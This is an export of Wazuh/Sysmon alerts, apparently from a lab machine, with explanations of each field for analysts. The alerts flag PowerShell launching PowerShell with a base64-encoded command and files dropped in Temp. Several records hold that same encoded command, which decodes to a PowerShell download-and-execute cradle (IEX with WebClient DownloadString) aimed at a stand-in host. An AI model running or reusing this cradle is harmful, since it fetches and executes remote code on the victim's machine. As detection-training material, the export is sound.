data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16768 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 143 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535425.2963955 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:03.4336005Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351117 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:03.394
ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00}
ProcessId: 13568
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_byyqns3s.1z0.ps1
CreationUtcTime: 2025-04-24 22:57:03.394
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:03.394 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1bd-680a-100d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_byyqns3s.1z0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:03.394 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 140 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535428.2966724 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:06.0234990Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351150 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:04.713
ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00}
ProcessId: 13988
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00}
ParentProcessId: 13568
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:04.713 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c0-680a-120d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 144 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535428.2974795 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:06.2461871Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351151 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:06.240
ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00}
ProcessId: 13988
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3wdrra44.odj.ps1
CreationUtcTime: 2025-04-24 22:57:06.240
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:06.240 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c0-680a-120d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3wdrra44.odj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:06.240 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 141 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535431.2977564 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:08.8267106Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351174 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:07.554
ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00}
ProcessId: 16876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00}
ParentProcessId: 13988
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:07.554 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c3-680a-140d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 145 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535431.2985635 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:09.0424583Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351175 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
